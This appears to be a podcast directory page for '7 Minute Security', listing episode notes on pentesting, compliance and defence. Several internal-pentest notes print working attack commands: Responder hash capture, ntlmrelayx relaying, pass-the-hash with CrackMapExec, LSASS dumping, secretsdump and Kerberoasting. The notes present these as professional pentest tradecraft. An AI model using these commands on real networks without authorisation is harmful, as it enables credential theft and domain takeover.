Cover image of 7 Minute Security
(54)
Technology
News
Tech News

7 Minute Security

Updated 2 months ago

Technology
News
Tech News
Read more

7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.

Read more

7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.

iTunes Ratings

54 Ratings
Average Ratings
50
2
2
0
0

Great small bits of security

By Infinity dreamer 90 - Feb 20 2019
Read more
Thanks for sharing your security secrets!

Brian Johnson

By Caneron Johnson - May 06 2018
Read more
Hey this is Cameron Luis Fronodo Johnson and I‚Äôm your son bye Dad love you!! ūüĎč

iTunes Ratings

54 Ratings
Average Ratings
50
2
2
0
0

Great small bits of security

By Infinity dreamer 90 - Feb 20 2019
Read more
Thanks for sharing your security secrets!

Brian Johnson

By Caneron Johnson - May 06 2018
Read more
Hey this is Cameron Luis Fronodo Johnson and I‚Äôm your son bye Dad love you!! ūüĎč
Cover image of 7 Minute Security

7 Minute Security

Latest release on Aug 12, 2020

Read more

7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.

Rank #1: 7MS #161: DIY Wifi Network Graphing & Dojo Scavenger Vulnerable Webapp

Feb 29 2016

8mins

Play

Rank #2: 7MS #116: Tips for a Succesful Vulnerability Scan

Podcast cover
Read more

In this episode I complain about getting stuck in NY for two days, and also how to efficiently scan for vulnerabilities when your time is crunched.

Dec 08 2015

14mins

Play

Rank #3: 7MS #291: The Quest for Critical Security Controls - Part 4

Podcast cover
Read more

Did I mention I love the Critical Security Controls? I do. And here's an absolute diamond I found this week:

This site (http://www.auditscripts.com/free-resources/critical-security-controls/) offers awesome CSC-mapping tools (and they're free!), specifically:

  • A spreadsheet with how the CSCs map to other popular frameworks like ISO and NIST

  • A manual assessment tool for measuring your org - or someone else's org - against the CSCs. Flippin' sweet right? RIGHT!

Also, be sure to come and Slack chat with us, as my pal hackernovice is building a tool called MacMon to help you satisfy CSC #1!

Lastly, I built an LOL-worthy pentesting recon tool called SSOTT (Scan Some of the Things) that might help you automate some NMAPing, DIRBing, NIKTOing, and the like. Cheggitout!

Dec 21 2017

13mins

Play

Rank #4: 7MS #299: Windows System Forensics 101

Podcast cover
Read more

I had the privilege of creating a Windows System Forensics 101 course/presentation for a customer. The good/bad news is there is so much good information out there, it's hard to boil things down to just an hour.

For the first part of the presentation, I focused on Mark Russinovich's technique of using Sysinternals as the primary surgical tool. This approach includes things like:

  1. Use Process Explorer to find processes with no signature and/or description.

  2. Put any suspicious processes to sleep before killing them (it's more humane! :-)

  3. Use autoruns to find registry entries, scheduled tasks, etc. that might be hooked to malicious executables that run on startup.

  4. Rinse and repeat.

In part 2 (coming up soon!), I'll continue the forensics fight and talk about tools like Redline, Volatility and FTK Imager! Stay tuned.

Feb 28 2018

10mins

Play

Rank #5: 7MS #155: Million Dollar Pentest Idea, Notepad Tricks and LL Bean Jackets for Dogs

Feb 16 2016

9mins

Play

Rank #6: 7MS #51: CEH vs. OSCP (audio)

Podcast cover
Read more

A few people have written in asking whether to pursue the CEH or OSCP (or both). This episode discusses my experience with each cert and hopefully points you in the right direction on which one might be right for you. Here‚Äôs the article on CEH I mention during the episode ‚Äď it has much more‚Ķ

Apr 07 2015

7mins

Play

Rank #7: 7MS #411: More Fun Stay-at-Home Security Projects

Podcast cover
Read more

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today is sort of a continuation of episode 407 where we covered four fun stay-at-home security projects including FoldingAtHome building a headless pi-hole, redoing your network with a Dream Machine, and enjoing some music via Zoom by way of Q.U.A.C.K.

In this episode, we cover:

  • Pentester Academy is awesome and currently has a steal of a deal if you're looking to score a membership on the cheap!

  • CompTIA caught my eye because they're offering 20% off certain tests/bundles with coupon code earthday2020. Personally I'm this close to pulling the trigger on this CompTIA Cloud+ bundle, and even better, they offer online testing during this stay-at-home time!

  • Pi-Holes are a free and awesome way to keep ads and other garbage off your network. Additionally, I give you 100 extra nerd points if you enable DNSSSEC. Just make sure your date/time settings on the box is correct, otherwise DNS will be pretty broken. I discuss a fix here on the 7MS forums....

Read more at 7ms.us!

Apr 24 2020

54mins

Play

Rank #8: 7MS #365: Interview with Ryan Manship and Dave Dobrotka - Part 3

Podcast cover
Read more

This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8.

First, a bit of miscellany:

  • If you replace "red rain" with "red team" in this song, we might just have a red team anthem on our hands!

  • If you're in the Twin Cities area and looking for an infosec analyst job, check out this posting with UBB. If interested, I can help make an electronic introduction - and/or let 'em know 7 Minute Security sent ya!

Ok, in today's program we're talking about red teaming again with our third awesome installment with Ryan and Dave who are professional red teamers! Today we cover:

  • Recon - it's super important! It's like putting together puzzle pieces...and the more of that puzzle you can figure out, less likely you'll be surprised and the more likely you'll succeed at your objective!

  • Reporting - how do you deliver reports in a way that blue team doesn't feel picked on, management understands the risk, and ultimately everybody leaves feeling charged to secure all the things?

I also asked the questions folks submitted to me via LinkedIn/Slack:

  • Any tips for the most dreaded part of an assessment (reports)?

  • How do you get around PowerShell v5 with restrict language mode without having the ability to downgrade to v2?

  • What's an alternative to PowerShell tooling for internal pentesting? (hint: C# is the hotness)

  • What certs/skills should I pursue to get better at red teaming (outside of "Hey, go build a lab!").

  • Are customers happy to get assessed by a red team exercise, or do they do it begrudgingly because of requirements/regulations?

May 30 2019

1hr 8mins

Play

Rank #9: 7MS #323: 7 Ways to Not Get Hacked

Podcast cover
Read more

I'm putting together a general security awareness session aimed at helping individuals and businesses not get hacked. To play off the lucky number 7, I'm trying to broil this list down to 7 key things to focus on. Here's my list thus far:

  1. Passwords
  2. 2FA/MFA
  3. Wifi (put a good password on it, don't use WEP, don't use WPS
  4. Sign up for HaveIBeenPwned
  5. Update all the things
  6. Block malware/mining with browser plugins
  7. Security awareness training

What do you think? Anything I missed or should consider swapping with another topic? Contact me!

Aug 16 2018

18mins

Play

Rank #10: 7MS #363: Interview with Ryan Manship and Dave Dobrotka - Part 2

Podcast cover
Read more

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

Yuss! It's true! Dave and Ryan are back!

Back in episode #326 we met Ryan Manship of RedTeam Security and Dave Dobrotka of United HealthGroup and talked about their cool and exciting careers as professional red teamers.

In this follow-up interview (which will be broken into a few parts), we talk through a red team engagement from start to finish. Today we cover questions like:

  • Who should have a red team exercise conducted? Who NEEDS one?

  • How do you choose an objective that makes sense?

  • What do you do about push-back from management and/or scope manipulation? (‚ÄúDon‚Äôt phish our CEO! She‚Äôll click stuff! Attack our servers, just not the production environment!!!‚ÄĚ). Spoiler alert: your clients need to have intestinal fortitude!

  • What‚Äôs better - a ‚Äúzero knowledge‚ÄĚ red team engagement or a collaborative exercise between testers and their clients?

  • How do you attack a high-security bunker?!

  • How do you conduct a red team exercise without ending up in jail? What does your ‚Äúget out of jail‚ÄĚ card get you - and NOT get you?

May 15 2019

57mins

Play

Rank #11: 7MS #94: Learn How to Burp - Part 1

Podcast cover
Read more

I've been looking for better ways to learn Burp Suite and I struck gold! Check out my recommendations in today's episode!

Sep 15 2015

8mins

Play

Rank #12: 7MS #100: Assessment Curses Can Be Blessings

Podcast cover
Read more

Ever had an assessment that you thought would be the death of you? I had one recently, but after sticking it out, it turned out to be a blessing in disguise.

Oct 09 2015

7mins

Play

Rank #13: 7MS #61: Why Local Admin Rights Suck (audio)

Podcast cover
Read more

Users running as local admins on their machine are a big risk! This episode discusses some reasons why, and also here is the link to the Avecto study I mention regarding how many Microsoft vulnerabilities would be thwarted by removing admin rights. 7MS #61: Why Local Admin Rights Suck (audio)

May 14 2015

8mins

Play

Rank #14: 7MS #303: Evaluating Endpoint Protection Solutions

Podcast cover
Read more

I'm working on a fun project right now where I'm evaluating endpoint protection solutions for a client. They're faced with a choice of either refreshing endpoints to the latest gen of their current product, or doing a rip and replace with something else.

I've spun up a standalone AD environment with ~5 Win 10 VMs and nothing on 'em except a current set of patches. The idea is I can assign each workstation VM an install of INSERT_NAME_OF_POPULAR_AV_VENDOR_HERE and have somewhat of a "bake off."

Now what I'm finding is there are great sites like AV Test or AV-Comparatives do a nice job of breaking down what kind of performance, features, and management offerings a given vendor has. But what I haven't found is some structured testing for "act like a bad guy" actions. I'm thinking things like:

  • Mimikatz tomfoolery
  • Lateral attacks with Metasploit shells
  • Egress port scanning (to find an acceptable outbound port for C2 or data exfil)
  • Jacking around with various PowerShell scripts and commands

However, thanks to some awesome friends on Slack they pointed me to what looks to be a nice set of scripts/tests - many of which could be used to see what kind of behaviors the endpoint protection will catch. So coming up in part #2 of this series, I'll do a deeper dive into:

Mar 29 2018

14mins

Play

Rank #15: 7MS #55: OFFTOPIC ‚Äď What‚Äôs in Brian‚Äôs Murse? (video)

Podcast cover
Read more

Ok I don‚Äôt really have a murse, but I wanted to do a short video(!) podcast to show you some sorta-security-related gadgets that I‚Äôve been nerding out on the last few weeks. 7MS #55: OFFTOPIC ‚Äď What‚Äôs in Brian‚Äôs Murse? (video)

Apr 22 2015

6mins

Play

Rank #16: 7MS #57: How to Review a Firewall (audio)

Podcast cover
Read more

In this episode I talk about a few different ways to approach firewall reviews/audits. This document was very helpful in getting my template started. Also check out Nipper if you’re looking for a firewall review/audit tool. 7MS #57: How to Review a Firewall (audio)

Apr 30 2015

8mins

Play

Rank #17: 7MS #277: Patching Solutions Bake-Off - Part 3

Podcast cover
Read more
ManageEngine Desktop Central

Overall, I have to bluntly say that I really enjoyed playing with ManageEngine's solution. It's got a crap-ton of features built into it - above and beyond patching - that I think IT/security folks will really appreciate.

Pros
  • Agent or agentless management of systems

  • MDM (didn't play with it but it certainly looks feature-rich)

  • Application white/blacklisting

  • Ability to push out configurations for things you'd normally use GPOs for - i.e. setting a login banner, enforcing screen locks, setting IE homepage and search engine, etc.

  • Patch management is full-featured - it's easy to setup a simple "scan systems, download and deploy missing patches." Or just a "scan to identify missing patches" kind of thing. It's easy to run a variety of reports to find out which systems are most vulnerable, which patches are missing across the enterprise, etc.

  • Software deployment engine - there's a big package library where you can easily search and deploy things like Dropbox, Adobe Reader, etc. It also includes a self-service portal where users can simply select certain packages and have them installed automagically!

  • Inventory - ability to have detailed hardware/software level details on each machine. Ability to block software by path and/or hash. You can also give people a warning saying "We're gonna nuke dropbox in 2 days if you keep it on here!"

  • Agent-based install gives you ability to chat with users, remote control systems, send announcements, drop to a command line at a target machine, etc.

  • Reports - you can create a report for just about anything under the sun like AD group changes, user logon reports, users that are disabled/expired, and on and on...

  • Email alerts - I think you can trigger an email alert for just about ANYTHING that happens in the environment.

...more on today's episode!

Sep 14 2017

13mins

Play

Rank #18: 7MS #379: Tales of Internal Network Pentest Pwnage - Part 7

Podcast cover
Read more

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

This episode, besides talking about a man who screamed at me for not being on my cell phone, covers another tale of internal network pentest pwnage! Topics/tactics covered include:

  • Review of setting up your DIY pentest dropbox
  • Choosing the right hardware (I'm partial to this NUC)
  • Running Responder to catch creds
  • Using Eyewitness to snag screenshots of stuff discovered with nmap scanning
  • Nmap for Eternal Blue with nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24
  • Running Sharphound to get a map of the AD environment
  • Cracking creds with Paperspace
  • When cracking, make sure to scrape the customer's public Web sites for more wordlist ideas!

Aug 30 2019

43mins

Play

Rank #19: 7MS #364: Tales of External Pentest Pwnage

Podcast cover
Read more

This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8.

This episode features cool things I'm learning about external pentesting. But first, some updates:

  • My talk at Secure360 went really well. Only slightly #awkward thing is I felt an overwhelming need to change my title slide to talk about the fact that I don't drink.

  • The 7MS User Group went well. We'll resume in the late summer or early fall and do a session on lockpicking!

  • Wednesday night my band had the honor of singing at a Minnesota LEMA service and wow, what an honor. To see the sea of officers and their supportive families and loved ones was incredibly powerful.

On the external pentest front, here are some items we cover in today's show:

  • MailSniper's Invoke-DomainHarvestOWA helps you discover the FQDN of your mail server target. Invoke-UsernameHarvestOWA helps you figure out what username scheme your target is using. Invoke-PasswordSprayOWA helps you do a low and slow password spray to hopefully find some creds!

  • Once inside the network, CrackMapExec is your friend. You can figure out where your compromised creds are valid across the network with this syntax:

crackmapexec smb 192.168.0.0/24 -u USER -p ‚ÄėPASSWORD‚Äô -d YOURDOMAIN

You can also find what shares you have access to with:

crackmapexec smb 192.168.0.0/24 -u USER -p ‚ÄėPASSWORD‚Äô -d YOURDOMAIN --shares

Sift through those shares! They often have VERY delicious bits of information in them :-)

May 23 2019

36mins

Play

Rank #20: 7MS #67: Wifi Sniffing is Fun-Part 2 (audio)

Podcast cover
Read more

This is a follow-up to episode #64, in which I did some fun wireless sniffing and tried to find sensitive data within it! In the episode I talk about the network ‚Äúmap‚ÄĚ of my sniffing setup. It looks like this: Ethernet from client->upstream port of hub My laptop with Wireshark->Hub Wifi access point->Hub To find‚Ķ

Jun 09 2015

7mins

Play

7MS #427: Interview with Ameesh Divatia from Baffle

Podcast cover
Read more

Today we're thrilled to welcome Ameesh Divatia from Baffle back to the program. We first met Ameesh back in episode 349 and today he's back to discuss a slew of additional hot security topics, including:

Misconfigured cloud databases

  • Why is this such a common issue, and how can we address it?
  • Wait wait wait...I just spun up a machine in Azure, AWS, Digital Ocean, etc. Isn't it secure because....it's the cloud?
  • What tools can we use to better secure our cloud databases?
  • How can we secure sensitive information as we migrate it from LAN side to the cloud?

CCPA (California Consumer Privacy Act)

  • What is the CCPA? How does it relate to GDPR?
  • If I'm a Californian, what can I demand to know from companies as far as how they're using my data? What¬†can't¬†I demand to know?
  • Will CCPA inspire folks to scrub their data from the hands of big companies and go more "off the grid?"
  • Does CCPA¬†only¬†apply to California residents and companies?

Secure data sharing

  • What are the current challenges with secure data sharing in terms of monitoring the flow of data within their systems and their partners‚Äô systems, while addressing privacy concerns?

  • What are some of the common mistakes companies make when sharing sensitive data internally or with partners/clients?

  • What is Secure Multiparty Compute (SMPC) and how can it help with secure data sharing?

Aug 12 2020

42mins

Play

7MS #426: Tales of Internal Pentest Pwnage - Part 19

Podcast cover
Read more

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

First and foremost, I have to say that 7 Minute Security's official stance on toads is that nobody should be licking them at any time, for any reason. Also, I can neither confirm nor deny that toads can catch coronavirus. Listen to today's episode...it'll make more sense.

We've got another swell tale of internal pentest pwnage for you today! Highlights include:

  • If you've collected a ton of hashes with¬†Responder, the included¬†DumpHash.py¬†gives you a lovely organized list of collected hashes!

  • Here's one way you can grab the latest CME binary:

curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip -L -o cme.zip

Note to self: I must've been using outdated CME forever, because the correct syntax to get the wdigest flag is now a little different:

cme smb HOST -u localadmin -H "hash" --local-auth -M wdigest -o ACTION=enable
  • If you're looking to block IPv6 (ab)use in your environment,¬†this article¬†has some great tips.

  • When testing in an environment with a finely tuned SIEM, I highly recommend you download all the Kali updates and tools ahead of time, as sometimes just the call out to kali.org gets flagged and alerted on to the security team

  • Before using the full¬†hatecrack¬†methodology, I like to run hashes straight through the list of PwnedPasswords from¬†hashes.org¬†(which appears to currently be offline) first to give the org an idea as to what users are using easy-to-pwn passwords.

  • A question for YOU reading this: what's the best way to do an LSASS dump remotely without triggering AV? I can't get any of the popular methods to work. So¬†pypykatz¬†is my go-to.

  • I learned that¬†PowerView¬†is awesome for finding attractive shares! Run it with¬†Find-InterestingDomainShareFile¬†to find, well, interesting files! Files with¬†password¬†or¬†sensitive¬†or¬†admin¬†in the title - and much more!

  • Got to use¬†PowerUpSQL¬†to audit some MS SQL sauce, and I found¬†this presentation¬†(specifically slide ~19) really helpful in locating servers I could log into and any SQL vulnerabilities the boxes were ripe for.

Aug 07 2020

49mins

Play

7MS #425: DIY Pentest Dropbox Tips - Part 2

Podcast cover
Read more

Today's episode is all about creating and deploying your own pentest dropbox! In part 1 I talked about some "gotchas" but this time around I'm ready to dump a whole slug of specific and updated tips on ya! Below are the tips covered in this episode that are better read than said:

For the Windows VM
  • Turn on RDP with PowerShell:
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0 Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
  • Change time zone with command line:
tzutil /s "Central Standard Time"
  • Install Chrome with PowerShell:
$LocalTempDir = $env:TEMP; $ChromeInstaller = "ChromeInstaller.exe"; (new-object System.Net.WebClient).DownloadFile('http://dl.google.com/chrome/install/375.126/chrome_installer.exe', "$LocalTempDir\$ChromeInstaller"); & "$LocalTempDir\$ChromeInstaller" /silent /install; $Process2Monitor = "ChromeInstaller"; Do { $ProcessesFound = Get-Process | ?{$Process2Monitor -contains $_.Name} | Select-Object -ExpandProperty Name; If ($ProcessesFound) { "Still running: $($ProcessesFound -join ', ')" | Write-Host; Start-Sleep -Seconds 2 } else { rm "$LocalTempDir\$ChromeInstaller" -ErrorAction SilentlyContinue -Verbose } } Until (!$ProcessesFound)
  • Install PowerUpSQL:
Install-Module -Name PowerUpSQL
  • Turn off sleepy time:
powercfg.exe -change -standby-timeout-ac 0
  • Install DotNet 3.5:
dism /online /Enable-Feature /FeatureName:"NetFx3" For the Kali VM
  • Refresh the SSH keys:
apt install openssh-server -y mkdir /etc/ssh/default_keys mv /etc/ssh/ssh_host_* /etc/ssh/default_keys/ dpkg-reconfigure openssh-server systemctl enable ssh.service systemctl start ssh.service
  • Get SharpHound and Mimikatz:
wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200519/mimikatz_trunk.zip wget https://github.com/BloodHoundAD/BloodHound/raw/master/Ingestors/SharpHound.exe
  • Install pypykatz
sudo pip3 install pypykatz
  • Install CrackMapExec binaries (which at time of this publication is this one):
curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip -L -o cme.zip

Jul 30 2020

37mins

Play

7MS #424: Cyber News - Everything is Pwned Edition

Podcast cover
Read more

Hello! We're back with our pal Joe "The Machine" Skeen (a.k.a. Gh0sthax) who has prepared some awesome and actionable news stories for us to digest. Today's stories include:

Jul 22 2020

33mins

Play

7MS #423: Tales of Internal Pentest Pwnage - Part 18

Podcast cover
Read more

This is an especially fun tale of pentest pwnage because it involves D.D.A.D. (Double Domain Admin Dance) and varying T.T.D.A. (Time to Domain Admin). The key takeaways I want to share from these tests are as follows:

  • Responder.py -i eth0 -rPv¬†is AWESOME. It can make the network rain hashes like manna from heaven!
  • Testing the egress firewall is easy with¬†this script. Consider¬†this SANS article¬†for guidance on ports to lock down.
  • Testing for MS14-025 is easy with¬†this site.
  • mitm6¬†and ntlmrelayx can work really well together to rain shells if you follow¬†this article. It's especially handy/focused when you create a¬†targets.txt¬†that looks something like this:
smb://CORP\Administrator@192.168.195.2 smb://CORP\Administrator@192.168.195.3 smb://CORP\brian.admin@192.168.195.7 192.168.195.7 192.168.195.10

Then save that as your targets.txt and run ntlmrelayx with ./ntlmrelayx.py -tf /targets.txt -socks -smb2support. From there, once you get active socks connections, you can connect to them directly with a full interactive shell with something like proxychains smbclient //192.168.195.2/ -U CORP/brian.admin

  • I ran into a weird issue with CrackMapExec where the¬†--local-auth¬†flag didn't seem to be working so I ended up trying the¬†binary version¬†and then it worked like a champ!

  • Looking to dump lsass a "clean" way? Try RDPing in directly to the victim machine, opening up¬†taskmgr.exe, click the¬†Details¬†tab, then right-click¬†lsass.exe¬†and choose¬†Create dump file¬†and bam, done.

  • Wanna spin up a quick SMB share from your Kali box? Try¬†smbserver.py -smb2support share /share

  • Then, once you've pulled back the lsass.dmp file, you can rip through it easily with:

pip3 install pypykatz sudo pypykatz lsa minidump lsass.dmp > lsass.txt

Then comb through lsass.txt and hopefully there will be some delicious and nutritious DA creds there for you to much on!

Jul 15 2020

59mins

Play

7MS #422: Eating the Security Dog Food - Part 2

Podcast cover
Read more

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit [safepass.me](https://safepass.me/?7ms422 for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today's episode continues the work we started in episode #419. We talk about the importance of having a good foundation of security documentation - including a reading out of the following policies:

  • Acceptable use
  • Data protection and privacy

Jul 10 2020

42mins

Play

7MS #421: Cyber News - Verizon DBIR Edition

Podcast cover
Read more

Today my pal Gh0sthax and I pick apart the Verizon Data Breach Investigations Report and help you turn it into actionable items so you can better defend your network!

I'm especially excited because today's episode marks two important 7MS firsts:

Jul 01 2020

36mins

Play

7MS #420: Tales of Internal Pentest Pwnage - Part 17

Podcast cover
Read more

Today's episode is a fun tale of pentest pwnage! Interestingly, to me this pentest had a ton of time-sponging issues on the front end, but the TTDA (Time to Domain Admin) was maybe my fastest ever.

I had to actually roll a fresh Kali VM to upload to the customer site, and I learned (the hard way) to make that VM disk as lean as possible. I got away with a 15 gig drive, and the OS+tools+updates took up about 12 gig.

One of the biggest lessons I learned from this experience is to make sure that not only is your Kali box updated before you take it to a customer site (see this script), but you should make sure you install all the tool dependencies beforehand as well (specifically, Eyewitness, Impacket and MITM6).

This pentest was also extremely time-boxed, so I tried to get as much bang out of it as possible. This included:

  • Capturing hashes with Responder
  • Checking for "Kerberoastable" accounts (GetUserSPNs.py -request -dc-ip x.x.x.x domain/user)
  • Check for MS14-025 (see¬†this article)
  • Check for MS17-010 (nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24 -oA vulnerable-2-eblue) and try¬†this method¬†of exploiting it
  • Check for DNS zone transfer (dnsrecon -d name.of.fqdn -t axf)
  • Test for egress filtering¬†of ports 1-1024
  • Took a backup of AD "the Microsoft way" and then cracked with secretsdump:

sudo python ./secretsdump.py -ntds /loot/Active\ Directory/ntds.dit -system /loot/registry/SYSTEM -hashes lmhash:nthash LOCAL -outputfile /loot/ad-pw-dump

Jun 26 2020

44mins

Play

7MS #419: Eating the Security Dog Food

Podcast cover
Read more

Today we're talking about eating the security dog food! What do I mean by that? Well, a lot of security companies I worked for in the past preached to clients about the importance of having a good security program, but didn't have one of their own! I'm trying to break that pattern now that I'm in a position to lead an information security program for 7MS.

In today's episode we talk about getting your company started with a good set of infosec policies/procedures. First up is a "mothership" infosec policy with the following sub-policies inside it:

  • Acceptable Use
  • Data Protection and Privacy
  • Physical Security
  • Tools and Technology
  • Training and Awareness
  • Reporting

Oh, and the song I jazz/scat/sang coming out of the jingle was If I Were a Dog

Jun 17 2020

40mins

Play

7MS #418: Securing Your Mental Health

Podcast cover
Read more

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today's episode is all about mental health! I talk about some of my challenges with stress/anxiety and how I finally put on my big boy pants, dropped some misconceptions and decided to do something about it. Additionally, this episode contains references to:

Jun 11 2020

44mins

Play

7MS #417: Vulnerability Scanning Tips and Tricks

Podcast cover
Read more

Today's episode is all about getting the most value out of your vulnerability scans, including:

  • Why, IMHO you should¬†only¬†do credentialed scans

  • Policy tweaks that will keep servers from tipping over and printers from printing novels of gibberish ;-)

  • How to make your scan report more actionable and less unruly

  • Turning up logging to 11 (use with caution!)

  • A small tweak to an external scan policy that can result in the difference between a successful or failed scan

  • The¬†nessusd.rules¬†file is¬†awesome¬†for excluding specific hosts and services from your scans

Jun 04 2020

43mins

Play

7MS #416: Pi-hole 5.0

Podcast cover
Read more

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

Today we're talking about some of my favorite features of Pi-hole 5.0. Including:

  • WARNING! WARNING! Upgrading from 4.x is a one-way operation!

  • Per-client blocking (you can setup, for example, a group machines called "kids" and apply specific domain block/allow lists and domains to them)

  • More granular detail (especially if there are issues) when blocklists get updated

  • Better, richer debug log output

I also talk about a great companion for yor Pi-hole: a command-line Internet speed test! Hat tip to Javali over at the 7MS forums who told me about this.

Additionally, I briefly mention "Hashy" (the nickname of my password cracking rig), give you some stay-at-home streaming TV show recommendations, and give you a quick house rebuild update!

May 28 2020

35mins

Play

7MS #415: Cyber News

Podcast cover
Read more

Today's episode kicks off a fun little experiment where my pal Joe Skeen and I cover some of the week's interesting security news stories, how they might affect you, and what you can do to make you and your company more secure. This week's stories:

May 21 2020

31mins

Play

7MS #414: Tales of Pentest Fail #4

Podcast cover
Read more

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today I'm excited to share more tales of pentest FAIL with you. Today's tales include:

  1. Accidentally scanning assets that belong to an agency that nobody should be messing with

  2. Delivering reports with vulnerabilities from somebody else's network

  3. Why it's important to write a report more than 15 minutes before delivery

  4. Lessons learned from firing a disgruntled employee

May 14 2020

1hr 4mins

Play

7MS #413: PCI Professional Certification (PCIP) - Part 3

Podcast cover
Read more

Hey everybody! I hope you're hanging in there during quarantine and staying healthy. Today is part 3 of our ongoing series all about becoming a PCIP. The good news is I'm finally, actually registered for the cert and have started diving into the training! So in today's episode I want to regurgitate some of what I'm learning to whet your appetite (or not) for this particular certification. Specifically, we cover:

  • The overview and objectives for being a PCIP (TLDR: PCIP does NOT replace QSA or ISA, but gives us a good understanding of how to protect payment card data)

  • How and why payment card data is leaked/stolen/breached - and then sold/monetized

  • The definition of some fundamental PCI acronym soup, including PCI DSS, PA-DSS and P2PE

May 07 2020

51mins

Play

7MS #412: Tips for Working Safely and Securely From Home

Podcast cover
Read more

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

In today's episode we share some tips for working more safely and securely from home, which for many of us is our new office for the foreseeable future! Specifically, we cover:

  • Picking powerful passwords
  • Locking down your wifi
  • Defending your digital identity
  • Protecting your PC
  • Blocking icky stuff in your browser
  • Composing careful conference calls
  • Clicking links carefully

I've also made this episode available in long-form blog here. Please feel free to share with anybody you think could benefit from the info!

May 01 2020

45mins

Play

7MS #411: More Fun Stay-at-Home Security Projects

Podcast cover
Read more

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today is sort of a continuation of episode 407 where we covered four fun stay-at-home security projects including FoldingAtHome building a headless pi-hole, redoing your network with a Dream Machine, and enjoing some music via Zoom by way of Q.U.A.C.K.

In this episode, we cover:

  • Pentester Academy is awesome and currently has a steal of a deal if you're looking to score a membership on the cheap!

  • CompTIA caught my eye because they're offering 20% off certain tests/bundles with coupon code earthday2020. Personally I'm this close to pulling the trigger on this CompTIA Cloud+ bundle, and even better, they offer online testing during this stay-at-home time!

  • Pi-Holes are a free and awesome way to keep ads and other garbage off your network. Additionally, I give you 100 extra nerd points if you enable DNSSSEC. Just make sure your date/time settings on the box is correct, otherwise DNS will be pretty broken. I discuss a fix here on the 7MS forums....

Read more at 7ms.us!

Apr 24 2020

54mins

Play

7MS #410: PCI Professional Certification (PCIP) - Part 2

Podcast cover
Read more

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

I’m gonna love you like coronavirus, I don’t know what else to say I’m gonna love you like coronavirus, I’m gonna stand 6 feet away Yes our love was meant to be, but it will have to wait until later Cuz I don’t wanna end up hooked up to a ventilator

In today's episode I continue sharing my journey about becoming a PCIP. Spoiler alert: I'm still applying to even start training to be one. Here's what we'll cover:

  • The pentesting requirement 11.3 from PCI that kind of boggles my brain, and some advice I got from a PCI guru that helped clear things up for me. This video also helped me better understand requirement 11.3.

  • The super sucky couple of personal quarantine days I‚Äôve had that include:

    • Cocoa that tastes like mint-flavored old lady diarrhea
    • Our fridge and freezer going ka-put
    • Exploding drinks in my fridge
    • A multi-thousand dollar repair on our new house that hasn‚Äôt even technically broken ground yet (!)

Apr 16 2020

57mins

Play

7MS #409: PCI Professional Certification (PCIP)

Podcast cover
Read more

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today I'm starting a journey to become a PCI Professional (PCIP), and I'll be periodically updating the status of this journey on the 7MS forums.

You don't need to be a QSA to get a PCIP, but you do need "2 years in IT or payments related background to have your application approved."

The PCIP certification gives you (and I'm quoting from the PCI Web site):

  • Principles of PCI DSS, PA-DSS, PCI PTS, and PCI P2PE Standards
  • Understanding of PCI DSS requirements and intent
  • Overview of basic payment industry terminology
  • Understanding the transaction flow
  • Implementing a risk-based prioritized approach
  • Appropriate uses of compensating controls
  • Working with third-parties and service providers
  • How and when to use Self-Assessment Questionnaires (SAQs)
  • Recognizing how new technologies affect the PCI (e.g. virtualization, tokenization, mobile, cloud)

